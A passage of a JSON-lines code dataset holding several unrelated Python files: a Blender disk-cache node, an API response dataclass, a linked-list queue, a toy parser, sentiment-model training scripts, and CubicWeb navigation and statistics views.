\"startFrame\", value = 1)\n self.newInput(\"Integer\", \"End Frame\", \"endFrame\", value = 250)\n self.newInput(\"Integer\", \"Max List Length\", \"maxListLength\", minValue=1, value = 1000)\n self.newOutput(\"Text\", \"File Path\", \"filePath\")\n\n def draw(self, layout):\n col = layout.column(align=True)\n subcol = col.column(align=True)\n subcol.scale_y = 1.5\n subrow = subcol.row(align=True)\n self.invokeFunction(subrow, \"writeToDisk\", description=\"Write to disk\", text=\"Write\", icon=\"DISK_DRIVE\")\n self.invokeFunction(subrow, \"deleteDiskCache\", description=\"Delete from disk\", text=\"Delete\", icon=\"TRASH\")\n col = layout.column(align=True)\n subcol = col.column(align=True)\n row = subcol.row(align=True)\n row.prop(self, \"classType\", text='')\n\n def writeToDisk(self):\n wm = bpy.context.window_manager\n wm.progress_begin(0, 100)\n wm.progress_update(1)\n\n try:\n packedData = cache.get(self.identifier, None)\n if packedData is None: return\n\n filePath = packedData.filePath\n classType = packedData.classType\n startFrame = packedData.startFrame\n endFrame = packedData.endFrame\n maxLength = packedData.maxLength\n\n if maxLength < 1 : return\n n = endFrame - startFrame + 1\n\n info = {\n 'n': n,\n 'max_length': maxLength,\n 'start_frame': startFrame,\n 'end_frame': endFrame,\n 'class_type': classType\n }\n restoreFrame = bpy.context.scene.frame_current\n with sd.Writer(filePath, info) as f:\n count = 0\n for i in range(startFrame, endFrame + 1):\n bpy.context.scene.frame_set(i)\n data = cache.get(self.identifier, None).data\n if data is None:return\n f.add(data)\n wm.progress_update(int((count/n) * 100))\n count += 1\n bpy.context.scene.frame_set(restoreFrame)\n\n except Exception as e:\n print(\"Disk writing Failed\")\n print(str(e))\n\n self.delete()\n wm.progress_end()\n\n def execute(self, filePath, data, startFrame, endFrame, maxListLength):\n if startFrame >= endFrame:\n self.raiseErrorMessage(\"End Frame should be greater than Start Frame\")\n\n listLength = len(data)\n if listLength > maxListLength:\n data = data[:maxListLength]\n\n cache[self.identifier] = DataContainer(\n data,\n filePath,\n self.classType,\n startFrame,\n endFrame,\n maxListLength)\n\n return filePath\n\n def deleteDiskCache(self):\n data = cache.get(self.identifier, None)\n if data:\n sd.delete(data.filePath)\n\n def delete(self):\n keys = list(cache.keys())\n for key in keys:\n if key.startswith(self.identifier):\n cache.pop(key, None)\n","repo_name":"harisreedhar/an_bluefox_extension","sub_path":"an_bluefox_extension/nodes/utility/disk_cache_writer.py","file_name":"disk_cache_writer.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"81"} +{"seq_id":"18672680307","text":"import dataclasses\nimport datetime\n\nimport app.api.helper_class as api_class\n\n\n@dataclasses.dataclass\nclass ProfileResponseModel(api_class.ResponseDataModel):\n uuid: int = 0\n name: str = 'PROFILE_NAME'\n description: str = 'SOME_DESCRIPTION'\n phone: str = '010-0000-0000'\n email: str = 'example@example.com'\n sns: str = '\\\"twitter\\\": \\\"TWITTER_USER_ID\\\"'\n data: dict[str, str] = dataclasses.field(default_factory=lambda: {})\n\n is_private: bool = False\n\n created_at: datetime.datetime = datetime.datetime.now()\n modified_at: datetime.datetime = datetime.datetime.now()\n modified: bool = False\n\n\nclass ProfileRelationResponseCase(api_class.ResponseCaseCollector):\n profilerelation_follows = api_class.Response(\n description='Requested profile follows this profile',\n code=200, success=True, # Set code to 201 when relations are created, not modified\n public_sub_code='profilerelation.follows')\n profilerelation_follow_requests = api_class.Response(\n description='Requested profile requested follow on this profile',\n code=200, success=True, # Set code to 201 when relations are created, not modified\n public_sub_code='profilerelation.follow_requests')\n profilerelation_blocks = api_class.Response(\n description='Requested profile blocks this profile',\n code=200, success=True, # Set code to 201 when relations are created, not modified\n public_sub_code='profilerelation.blocks')\n profilerelation_hides = api_class.Response(\n description='Requested profile hides this profile',\n code=200, success=True,\n public_sub_code='profilerelation.hides')\n profilerelation_cut_off = api_class.Response(\n description='Requested profile now cuts off relationship with this profile',\n code=204, success=True,\n public_sub_code='profilerelation.cut_off')\n\n profilerelation_in_follow_request_state = api_class.Response(\n description='You are on a follow-request state with this profile',\n code=409, success=False,\n public_sub_code='profilerelation.in_follow_request_state')\n profilerelation_already_in_state = api_class.Response(\n description='You are already on requested state with this profile',\n code=409, success=False,\n public_sub_code='profilerelation.already_on_state')\n\n profilerelation_not_related = api_class.Response(\n description='You aren\\'t on any relationship with this profile',\n code=404, success=False,\n public_sub_code='profilerelation.not_related')\n","repo_name":"MU-Software/bca_backend","sub_path":"app/api/bca/profile/profilerelation_response_case.py","file_name":"profilerelation_response_case.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39731853548","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass Queue:\n def __init__(self):\n self.front = None\n self.rear = None\n\n def _is_empty(self):\n return self.front is None\n\n def enqueue(self, item):\n new_node = Node(item)\n if self._is_empty():\n self.rear = self.front = new_node\n return\n\n self.rear.next = new_node\n self.rear = new_node\n print(\"Enqueued {}\".format(item))\n\n def dequeue(self):\n if self._is_empty():\n print(\"Underflow!\")\n return\n to_delete = self.front\n self.front = self.front.next\n print(\"Dequeued {}\".format(to_delete.data))\n\n def print_q(self):\n if self._is_empty():\n print(\"Empty Queue!\")\n return\n\n temp = self.front\n while temp != self.rear:\n print(temp.data, end=\"->\")\n temp = temp.next\n\n print(self.rear.data, end=\"->\")\n print(\"END\")\n\n\nif __name__ == \"__main__\":\n print(\"Queue via Linked List\")\n\n q = Queue()\n q.print_q()\n\n q.enqueue('a')\n q.print_q()\n\n q.enqueue('b')\n q.enqueue('c')\n q.enqueue('d')\n q.enqueue('e')\n q.print_q()\n\n q.dequeue()\n q.print_q()\n\n q.dequeue()\n q.dequeue()\n q.dequeue()\n q.print_q()\n\n q.dequeue()\n q.print_q()\n\n q.enqueue('f')\n q.enqueue('g')\n q.print_q()\n q.dequeue()\n q.print_q()\n","repo_name":"nishasinha/DataStructures","sub_path":"src/datastructures/queue/viaLinkedList.py","file_name":"viaLinkedList.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7930746257","text":"def max_num(num1, num2, num3):\n if num1 == num2 or num1 == num3 or num2 == num3 or (num1 == num2 and num1 == num3):\n print(\"Dwie lub wszystkie liczby sa takie same\")\n if num1 >= num2 and num1 >= num3:\n return num1\n elif num2 >= num1 and num2 >= num3:\n return num2\n else:\n return num3\n\nprint(max_num(600,600,67))","repo_name":"dochman-ato/Python-Basics","sub_path":"13_IF_Statements_and_comparisons.py","file_name":"13_IF_Statements_and_comparisons.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15800403128","text":"import re\n\n#Collaboration with Jasper Burns, Kevin Mannix\n\nRESERVEDWORDS = ['true', 'false', 'xor', 'not', 'log']\n\n# 1a\ndef variable(ts):\n\tif re.match(\"^([a-z][\\w]*)$\", ts[0]) and ts[0] not in RESERVEDWORDS:\n\t\treturn ts[0], ts[1:]\n\telse:\n\t\treturn None, None\n\ndef number(ts):\n\tif re.match(\"-?\\d+$\", ts[0]):\n\t\treturn int(ts[0]), ts[1:]\n\telse:\n\t\treturn None, None\n\n#1b\ndef formula(ts):\n\te1, ts = left(ts)\n\n\tif e1 is not None:\n\t\tif ts:\n\t\t\tif ts[0] == 'xor':\n\t\t\t\te2, ts = formula(ts[1:])\n\t\t\t\tif e2 is not None:\n\t\t\t\t\treturn {'Xor': [e1, e2]}, ts\n\t\t\t\treturn None, None\n\t\treturn e1, ts\n\treturn None, None\n\ndef left(ts):\n\tif ts[0] == 'not':\n\t\te1, ts = fparenthesis(ts[1:])\n\t\treturn {'Not': [e1]}, ts\n\n\tif ts[0] == '(':\n\t\te1, ts = fparenthesis(ts)\n\t\treturn {'Parens': [e1]}, ts\n\n\telif ts[0] == 'true':\n\t\treturn 'True', ts[1:]\n\n\telif ts[0] == 'false':\n\t\treturn 'False', ts[1:]\n\n\telse:\n\t\tvar, ts = variable(ts)\n\t\tif var is not None:\n\t\t\treturn {'Variable': [var]}, ts\n\t\treturn None, None\n\ndef fparenthesis(ts):\n\tif ts[0] == '(':\n\t\te1, ts = formula(ts[1:])\n\t\tif ts[0] == ')':\n\t\t\treturn e1, ts[1:]\n\n#1c\ndef term(ts):\n\te1, ts = factor(ts)\n\n\tif e1 is not None:\n\t\tif ts:\n\t\t\tif ts[0] == '+':\n\t\t\t\te2, ts = term(ts[1:])\n\t\t\t\tif e2 is not None:\n\t\t\t\t\treturn {'Plus': [e1, e2]}, ts\n\t\t\t\treturn None, None\n\t\treturn e1, ts\n\treturn None, None\n\ndef factor(ts):\n\te1, ts = leftfactor(ts)\n\n\tif e1 is not None:\n\t\tif ts:\n\t\t\tif ts[0] == '*':\n\t\t\t\te2, ts = factor(ts[1:])\n\t\t\t\tif e2 is not None:\n\t\t\t\t\treturn {'Mult': [e1, e2]}, ts\n\t\t\t\treturn None, None\n\t\treturn e1, ts\n\treturn None, None\n\ndef leftfactor(ts):\n\tif ts[0] == 'log':\n\t\te1, ts = parenthesis(ts[1:])\n\t\treturn {'Log': [e1]}, ts\n\n\tif ts[0] == '(':\n\t\te1, ts = parenthesis(ts)\n\t\treturn {'Parens': [e1]}, ts\n\n\telse:\n\t\tvar, tsV = variable(ts)\n\t\tnum, tsN = number(ts)\n\t\tif var is not None:\n\t\t\treturn {'Variable': [var]}, tsV\n\t\telif num is not None:\n\t\t\treturn {'Number': [num]}, tsN\n\n\t\treturn None, None\n\ndef parenthesis(ts):\n\tif ts[0] == '(':\n\t\te1, ts = term(ts[1:])\n\t\tif ts[0] == ')':\n\t\t\treturn e1, ts[1:]\n\n#1d\ndef program(ts):\n\tif not ts or ts[0] == '}':\n\t\treturn 'End', ts\n\telse:\n\t\tif ts[0] == 'print':\n\t\t\texp, ts = expression(ts[1:])\n\t\t\tif exp is not None:\n\t\t\t\tif ts[0] == ';':\n\t\t\t\t\tend, ts = program(ts[1:])\n\t\t\t\t\tif end is not None:\n\t\t\t\t\t\treturn {'Print': [exp, end]}, ts\n\n\t\telif ts[0] == 'assign':\n\t\t\tvar, ts = variable(ts[1:])\n\t\t\tif var is not None:\n\t\t\t\tif ts[0] == ':=':\n\t\t\t\t\texp, ts = expression(ts[1:])\n\t\t\t\t\tif exp is not None:\n\t\t\t\t\t\tif ts[0]==';':\n\t\t\t\t\t\t\tend, ts = program(ts[1:])\n\t\t\t\t\t\t\tif end is not None:\n\t\t\t\t\t\t\t\treturn {'Assign': [{'Variable':[var]}, exp, end]}, ts\n\t\telif ts[0] == 'if':\n\t\t\texp, ts = expression(ts[1:])\n\t\t\tif exp is not None:\n\t\t\t\tif ts[0] == '{':\n\t\t\t\t\tprog, ts = program(ts[1:])\n\t\t\t\t\tif prog is not None:\n\t\t\t\t\t\tif ts[0] == '}':\n\t\t\t\t\t\t\tprog2, ts = program(ts[1:])\n\t\t\t\t\t\t\tif prog2 is not None:\n\t\t\t\t\t\t\t\treturn {'If':[exp, prog, prog2]}, ts\n\t\telif ts[0] == 'while':\n\t\t\texp, ts = expression(ts[1:])\n\t\t\tif exp is not None:\n\t\t\t\tif ts[0] == '{':\n\t\t\t\t\tprog, ts = program(ts[1:])\n\t\t\t\t\tif prog is not None:\n\t\t\t\t\t\tif ts[0] == '}':\n\t\t\t\t\t\t\tprog2, ts = program(ts[1:])\n\t\t\t\t\t\t\tif prog2 is not None:\n\t\t\t\t\t\t\t\treturn {'While':[exp, prog, prog2]}, ts\n\n\t\treturn None\n\n\n\ndef expression(ts):\n\tt, tst = term(ts)\n\tf, tsf = formula(ts)\n\n\n\tif t and f:\n\t\tif len(tst) < len(tsf):\n\t\t\treturn t, tst\n\t\telse:\n\t\t\treturn f, tsf\n\telif f:\n\t\treturn f, tsf\n\telif t:\n\t\treturn t, tst\n\n\telse:\n\t\treturn None, None\n\n\n\n\n\n\n\n\n\n\n","repo_name":"moneydance/CS320","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74421343625","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimport pdb\n\ndef readdat(filename):\n #filename = 'trajectory_360.dat'\n output = np.loadtxt(filename)\n x = output[:,0]\n y = output[:,1]\n return x, y\n\nx1, y1 = readdat('DATA/init.dat')\n#x2, y2 = readdat('tracks/trajectory_3600.dat')\n#x3, y3 = readdat('tracks/trajectory_720.dat')\n\nplt.plot(x1, y1, '.r', markersize=8)\n#plt.plot(x2, y2, '.b', markersize=10)\n#plt.plot(x3, y3, '.k', markersize=5)\nplt.show()\n\npdb.set_trace()\n","repo_name":"fdongyu/PCSE_final","sub_path":"readinit.py","file_name":"readinit.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30197517162","text":"from eval.functions import *\nfrom models.Data import *\nfrom models.Max_Ent import *\nfrom models.Naive_Bayes import *\nimport pickle\n\nif __name__ == '__main__':\n ## read bull and bear\n bear_fp = \"/Users/fredzheng/Documents/stocktwits/sentiment/Bearish\"\n bull_fp = \"/Users/fredzheng/Documents/stocktwits/sentiment/Bullish\"\n data_fp = \"/Users/fredzheng/Documents/stocktwits/sentiment/data_object.pkl\"\n w2v_fp = \"/Users/fredzheng/Documents/stocktwits/sentiment/word2vec\"\n\n load_existing_object = True\n if load_existing_object:\n con = open(data_fp, \"rb\")\n data = pickle.load(con)\n con.close()\n else:\n data = Data()\n data.loads(bull_fp, bear_fp, max_n=50000)\n data.clean()\n data.cut_train_and_test(balance=True)\n # data.save(data_fp)\n\n ## prep data\n tweets_train = data.train\n trainX = [tweet.words for tweet in tweets_train]\n trainY = [tweet.label for tweet in tweets_train]\n train = list(zip(trainX, trainY))\n\n tweets_test = data.test\n testX = [tweet.words for tweet in tweets_test]\n testY = [tweet.label for tweet in tweets_test]\n test = list(zip(testX, testY))\n\n ## naive bayes\n nb = Naive_Bayes(train)\n pred_nb = [nb.pred_label(W) for W, y in train]\n eval(pred_nb, trainY) ## training error 15.29%\n\n ## maxent\n maxent = Max_Entropy(train, num_of_epoch=100)\n pred_me = [maxent.pred_label(W) for W, y in train]\n eval(pred_me, [y for W, y in train]) ## training error 13.95%\n\n ## test error\n pred_nb = [nb.pred_label(W) for W, y in test]\n eval(pred_nb, [y for W, y in test]) ## test error 25.67%\n\n pred_me = [maxent.pred_label(W) for W, y in test]\n eval(pred_me, [y for W, y in test]) ## test error 31.42%\n","repo_name":"NEWBY2017/SentiTrack","sub_path":"NB_MaxEnt_start.py","file_name":"NB_MaxEnt_start.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1227876886","text":"import json\nfrom packaging import version\n\n# Cubicweb import\nimport cubicweb\ncw_version = version.parse(cubicweb.__version__)\nif cw_version >= version.parse(\"3.21.0\"):\n from cubicweb import _\n\nfrom cubicweb.web import component\nfrom cubicweb.view import EntityView\nfrom cubicweb.predicates import is_instance\nfrom cubicweb.predicates import nonempty_rset\nfrom cubicweb.predicates import anonymous_user\nfrom cubicweb.predicates import one_line_rset\nfrom cubicweb.predicates import match_view\nfrom cubicweb.predicates import match_kwargs\nfrom cubicweb.predicates import authenticated_user\nfrom cubicweb.web.views.basecomponents import AnonUserStatusLink\nfrom cubicweb.web.views.basecomponents import ApplLogo\nfrom cubicweb.web.views.basecomponents import HeaderComponent\nfrom cubicweb.web.views.baseviews import MetaDataView\nfrom cubicweb.web.views.ibreadcrumbs import BreadCrumbEntityVComponent\nfrom cubicweb.web.views.ibreadcrumbs import BreadCrumbLinkToVComponent\nfrom cubicweb.web.views.ibreadcrumbs import BreadCrumbAnyRSetVComponent\nfrom cubicweb.web.views.ibreadcrumbs import BreadCrumbETypeVComponent\nfrom logilab.common.decorators import monkeypatch\n\n# Cubes import\nfrom cubes.bootstrap.views.basecomponents import BSAuthenticatedUserStatus\nfrom cubicweb.web.views.boxes import EditBox\nfrom cubes.rql_upload.views.components import CWUploadBox\nfrom cubes.rql_upload.views.utils import load_forms\n\n\n\n##############################################################################\n# Time left\n##############################################################################\n\n\nclass TimeLeft(HeaderComponent):\n \"\"\" Build a time left before session expiration display in the header.\n \"\"\"\n __regid__ = \"time-left\"\n __select__ = authenticated_user()\n context = u\"header-right\"\n order = 3\n\n def render(self, w):\n\n # Get the expiration delay\n expiration_delay = self._cw.vreg.config.get(\n \"apache-cleanup-session-time\")\n if expiration_delay is None:\n expiration_delay = self._cw.vreg.config.get(\n \"cleanup-session-time\")\n if expiration_delay is None:\n return\n\n # Define the expiration delay div\n w(u''.format(\n self._cw.session.sessionid))\n w(u''.format(\n expiration_delay * 1000))\n w(u'Auto logout in: ::'\n '')\n\n\n###############################################################################\n# Navigation Box\n###############################################################################\n\nclass PIWSAuthenticatedUserStatus(BSAuthenticatedUserStatus):\n \"\"\"\n Overrride bootstrap user-status component.\n In all-in-one.conf:\n If show_user_status=no : display nothing.\n If show_user_status=yes and enable-apache-logout=no: display the default\n bootstrap cube component.\n If show_user_status=yes and enable-apache-logout=yes: display a logout\n button next to the search field.\n If show_user_status=yes and enable-apache-logout=no and\n apache-cleanup-session-time is not empty: raise an error.\n \"\"\"\n def render(self, w):\n config = self._cw.vreg.config\n if config.get(\"show_user_status\"):\n if config.get(\"enable-apache-logout\"):\n w(u\"Logout\".format(\n self._cw.base_url() + 'logout'))\n else:\n super(PIWSAuthenticatedUserStatus, self).render(w)\n else:\n w(u\"\")\n\n\nclass PIWSNavigationtBox(component.CtxComponent):\n \"\"\" Display a box containing navigation shortcuts.\n\n To add documentation to the 'All Questionnaires' documentation main button,\n add a 'All Questionnaires.rst' file in instance all-in-one\n 'documentation_folder' parameter configuration file.\n\n Set the 'display_assessment' to False to remove the 'Assessments'\n button.\n\n Set the 'display_metagen' to False to remove the 'MetaGen' button.\n\n Set the 'display_scan' to False to remove the 'Scans' button.\n\n Set the 'display_genomic' to False to remove the 'Genomic' button.\n\n Set the 'display_score' to False to remove the 'Quality Scores' button.\n\n Set the 'display_study' to True to display the 'Study' tab.\n \"\"\"\n __regid__ = \"nav_box\"\n context = \"left\"\n title = _(\"Navigation\")\n order = 0\n display_assessment = True\n display_metagen = True\n display_scan = True\n display_genomic = True\n display_study = False\n display_score = True\n display_history = True\n auto_disable_qc = False\n\n def render_body(self, w):\n \"\"\" Create the different item of the navigation box.\n \"\"\"\n # Study\n studies = []\n if self.display_study:\n\n # Request all the available studies\n studies = [row[0] for row in self._cw.execute(\n \"DISTINCT Any SN ORDERBY SN Where S is Study, S name SN\")]\n\n # Display a study selection tab bar\n w(u'
    ')\n w(u'
  • ALL
  • ')\n for i, study in enumerate(studies, start=2):\n w(u'
  • {1}
  • '.format(i, study))\n w(u'
')\n\n # Add a script to manage the tab bar selection\n w(u'')\n\n # Study navigation\n w(u'
')\n w(u'
')\n self.study_nav(w, study=None)\n w(u'
')\n for i, study in enumerate(studies, start=2):\n w(u'
'.format(i))\n self.study_nav(w, study=study)\n w(u'
')\n w(u'
')\n\n def study_nav(self, w, study=None):\n \"\"\" Create the different item of the study navigation box.\n \"\"\"\n\n # Subjects\n w(u'
')\n w(u'
')\n rql = \"Any S Where S is Subject\"\n if study is not None:\n rql += \", S study ST, ST name '{0}'\".format(study)\n href = self._cw.build_url(rql=rql)\n w(u''.format(href))\n w(u'Subjects')\n w(u'

')\n\n # Assessments\n if self.display_assessment:\n w(u'
')\n w(u'
')\n rql = \"Any A Where A is Assessment\"\n if study is not None:\n rql += \", A study ST, ST name '{0}'\".format(study)\n href = self._cw.build_url(rql=rql)\n w(u''.format(href))\n w(u'Assessments')\n w(u'

')\n\n # Scan\n if self.display_scan:\n rql = \"Any S Where S is Scan\"\n if study is not None:\n rql += \", S study ST, ST name '{0}'\".format(study)\n # > disable QC buttons\n if self.auto_disable_qc:\n rql_scores = (\"DISTINCT Any T \" + rql[5:] +\n \", S type T, S score_values V\")\n rset = self._cw.execute(rql_scores)\n active_types = set(row[0] for row in rset)\n # > build navigation\n href = self._cw.build_url(rql=rql)\n rql_types = \"DISTINCT Any T ORDERBY T \" + rql[5:] + \", S type T\"\n rset = self._cw.execute(rql_types)\n types = [line[0] for line in rset.rows]\n if len(types) > 0:\n # > main button\n w(u'
')\n w(u'
')\n # > typed buttons container\n w(u'
'.format(study))\n w(u'
')\n w(u'
')\n # > typed buttons\n for ptype in types:\n typed_rql = rql + \", S type '{0}'\".format(ptype)\n href = self._cw.build_url(rql=typed_rql)\n w(u'
')\n w(u'
')\n w(u''.format(href))\n w(u'{0}'.format(ptype))\n href = self._cw.build_url(\n \"view\", vid=\"score-value-table-secondary\",\n study=study or \"\", etype=\"Scan\", rtype=ptype,\n rsubject=\"subject\", pname=\"description\",\n title=\"QC Scores\", elts_to_sort=[\"ID\"],\n tooltip_name=\"QC\")\n btn_status = \"active\"\n if self.auto_disable_qc and ptype not in active_types:\n btn_status = \"disabled\"\n w(u''.format(btn_status, href))\n w(u'QC')\n w(u'

')\n w(u'
')\n w(u'

')\n\n # QuestionnaireRun\n ajaxcallback = \"get_questionnaires_data\"\n rql_labels = (\"DISTINCT Any T ORDERBY T WHERE A is Assessment, \"\n \"A timepoint T\")\n rql = \"Any QR Where QR is QuestionnaireRun\"\n if study is not None:\n rql += \", QR study ST, ST name '{0}'\".format(study)\n rql_labels += \", A study ST, ST name '{0}'\".format(study)\n href = self._cw.build_url(rql=rql)\n rql_types = (\"DISTINCT Any T ORDERBY T \" + rql[6:] +\n \", QR questionnaire Q, Q type T\")\n rset = self._cw.execute(rql_types)\n types = [line[0] for line in rset.rows]\n if len(types) > 0:\n # > main button\n w(u'
')\n w(u'
')\n # > typed buttons container\n w(u'
'.format(study))\n w(u'
')\n w(u'
')\n # > typed buttons\n for qtype in types:\n href = self._cw.build_url(\n \"view\", vid=\"jtable-table\",\n rql_labels=rql_labels, ajaxcallback=ajaxcallback,\n title=\"All Questionnaires\", elts_to_sort=[\"ID\"],\n tooltip_name=\"All Questionnaires\", qtype=qtype,\n study=study or \"\")\n w(u'
')\n w(u'
')\n w(u''.format(href))\n w(u'{0}'.format(qtype))\n w(u'

')\n w(u'
')\n w(u'

')\n\n # ProcessingRun\n rql = \"Any P Where P is ProcessingRun\"\n if study is not None:\n rql += \", P study ST, ST name '{0}'\".format(study)\n # > disable QC buttons\n if self.auto_disable_qc:\n rql_scores = (\"DISTINCT Any T \" + rql[5:] +\n \", P type T, P score_values V\")\n rset = self._cw.execute(rql_scores)\n active_types = set(row[0] for row in rset)\n # > build navigation\n href = self._cw.build_url(rql=rql)\n rql_types = \"DISTINCT Any T ORDERBY T \" + rql[5:] + \", P type T\"\n rset = self._cw.execute(rql_types)\n types = [line[0] for line in rset.rows]\n if len(types) > 0:\n # > main button\n w(u'')\n # > typed buttons container\n w(u'
'.format(study))\n w(u'
')\n w(u'
')\n # > typed buttons\n for ptype in types:\n typed_rql = rql + \", P type '{0}'\".format(ptype)\n href = self._cw.build_url(rql=typed_rql)\n w(u'
')\n w(u'
')\n w(u''.format(href))\n w(u'{0}'.format(ptype))\n href = self._cw.build_url(\n \"view\", vid=\"score-value-table-secondary\", study=study or \"\",\n etype=\"ProcessingRun\", rtype=ptype, pname=\"parameters\",\n rsubject=\"subjects\", title=\"QC Scores\",\n elts_to_sort=[\"ID\"], tooltip_name=\"QC\")\n btn_status = \"active\"\n if self.auto_disable_qc and ptype not in active_types:\n btn_status = \"disabled\"\n w(u''.format(btn_status, href))\n w(u'QC')\n w(u'

')\n w(u'
')\n w(u'

')\n\n # GenomicMeasures\n if self.display_genomic:\n w(u'
')\n w(u'
')\n rql = \"Any GM Where GM is GenomicMeasure\"\n if study is not None:\n rql += \", GM study ST, ST name '{0}'\".format(study)\n href = self._cw.build_url(rql=rql)\n w(u''.format(href))\n w(u'Genomic measures')\n w(u'

')\n\n # MetaGen\n if self.display_metagen:\n w(u'
')\n w(u'
')\n href = self._cw.build_url(rql=\"Any C Where C is Chromosome\")\n w(u''.format(href))\n w(u'MetaGen (hg38 dbsnp149)')\n w(u'

')\n\n # CWSearch\n w(u'
')\n w(u'
')\n w(u'
')\n href = self._cw.build_url(rql=\"Any S Where S is CWSearch\")\n w(u''.format(href))\n w(u' '\n u'My cart')\n w(u'

')\n\n # History\n if self.display_history:\n w(u'
')\n w(u'
')\n w(u'
')\n href = self._cw.build_url(vid=\"piws-history\")\n w(u''.format(href))\n w(u' '\n u'History')\n w(u'

')\n\n\n###############################################################################\n# Statistic boxes\n###############################################################################\n\nclass PIWSSubjectStatistics(component.CtxComponent):\n \"\"\" Display a box containing links to statistics on the cw entities.\n \"\"\"\n __regid__ = \"subject_statistics\"\n context = \"left\"\n title = _(\"Statistics\")\n order = 1\n __select__ = is_instance(\"Subject\")\n\n def render_body(self, w, **kwargs):\n \"\"\" Method to create the statistic box content.\n \"\"\"\n # Create a view to see the subject gender repartition in the db\n href = self._cw.build_url(\"view\", vid=\"highcharts-basic-pie\",\n rql=\"Any G WHERE S is Subject, S gender G\",\n title=\"Subject genders\")\n w(u'
')\n w(u'

')\n\n # Create a view to see the subject handedness repartition in the db\n href = self._cw.build_url(\n \"view\", vid=\"highcharts-basic-pie\",\n rql=\"Any H WHERE S is Subject, S handedness H\",\n title=\"Subject handednesses\")\n w(u'
')\n\n\nclass PIWSAssessmentStatistics(component.CtxComponent):\n \"\"\" Display a box containing links to statistics on the cw entities.\n \"\"\"\n __regid__ = \"assessment_statistics\"\n context = \"left\"\n title = _(\"Statistics\")\n order = 1\n __select__ = is_instance(\"Assessment\")\n\n def render_body(self, w, **kwargs):\n \"\"\" Method to create the statistic box content.\n \"\"\"\n # Create a view to see the db acquistion status\n href = self._cw.build_url(\n \"view\", vid=\"highcharts-relation-summary-view\",\n rql=\"Any A WHERE A is Assessment\", title=\"Acquisition status\",\n relations=[\"scans\", \"questionnaire_runs\", \"genomic_measures\"],\n subject_attr=\"timepoint\", object_attr=\"label\")\n w(u'
')\n w(u'

')\n\n # Create a view to see the db processing status\n href = self._cw.build_url(\n \"view\", vid=\"highcharts-relation-summary-view\",\n rql=\"Any A WHERE A is Assessment\", title=\"Processing status\",\n relations=\"processing_runs\", subject_attr=\"timepoint\",\n object_attr=\"label\")\n w(u'
')\n w(u'

')\n\n # Create a view to see the db subject age distribution\n href = self._cw.build_url(\n \"view\", vid=\"highcharts-basic-plot\",\n rql=\"Any A WHERE X is Assessment, X age_of_subject A\",\n title=\"Age distribution\", is_hist=True)\n w(u'
')\n w(u'

')\n\n\nclass PIWSSummary(component.CtxComponent):\n \"\"\" Display a summary table of all the available datasets.\n \"\"\"\n __regid__ = \"stat_box\"\n contextual = True\n context = \"right\"\n title = (\"Database content\")\n order = 0\n __select__ = match_view(\"index\")\n categories = [\"Scan\", \"QuestionnaireRun\", \"ProcessingRun\"]\n nb_types = None\n categories_mapping = {\n \"Timepoint\": \"\",\n \"Scan\": \"Scans\",\n \"QuestionnaireRun\": \"Tables\",\n \"ProcessingRun\": \"Processed data\"}\n rql_subjects = \"Any S WHERE S is Subject, S study ST, ST name '{0}'\"\n\n def render_body(self, w):\n \"\"\" Method to create the summary table for each study.\n \"\"\"\n # Get an admin connection\n with self._cw.session.repo.internal_cnx() as session:\n\n # Go through each study\n studies = [row[0] for row in session.execute(\n \"DISTINCT Any SN ORDERBY SN Where S is Study, S name SN\")]\n for study in studies:\n\n # Display the study name\n w(u\"Study: {0}

\".format(study))\n\n # Get all the subjects attached to the current study\n rql = self.rql_subjects.format(study)\n nb_subjects = session.execute(rql).rowcount\n\n # Create the table\n w(u\"\")\n w(u\"\")\n for header in [\"Timepoint\"] + self.categories:\n w(u\"\".format(self.categories_mapping[header]))\n w(u\"\")\n\n # Go through each timepoint (one row per timepoint in the tab)\n timepoints = [row[0] for row in session.execute(\n (\"DISTINCT Any T ORDERBY T WHERE A is Assessment, \"\n \"A timepoint T, A study ST, ST name '{0}'\".format(study)))]\n for timepoint in timepoints:\n\n # Go through each category (one column per category in\n # the tab)\n w(u\"\")\n w(u\"\".format(timepoint))\n for category in self.categories:\n\n # Deal with questionnaire special case\n if category == \"QuestionnaireRun\":\n type_name = \"label\"\n else:\n type_name = \"type\"\n\n # Compute the fill ratio\n try:\n nb_types = self.nb_types[study][category]\n except:\n rql = (\"DISTINCT Any T WHERE X is {0}, X {1} T, \"\n \"X study ST, ST name '{2}'\".format(\n category, type_name, study))\n nb_types = session.execute(rql).rowcount\n rql = (\n \"Any X WHERE X is {0}, X study ST, ST name \"\n \"'{1}', X in_assessment A, A timepoint \"\n \"'{2}'\".format(category, study, timepoint))\n nb_items = session.execute(rql).rowcount\n ratio = 0.\n if nb_types != 0 and nb_subjects != 0:\n ratio = (float(nb_items) /\n float(nb_types * nb_subjects))\n\n # Display the fill ratio\n w(u\"\")\n\n w(u\"\")\n\n w(u\"
{0}
{0}\")\n w(u\"\"\n \"\".format(ratio * 100.))\n w(u\"
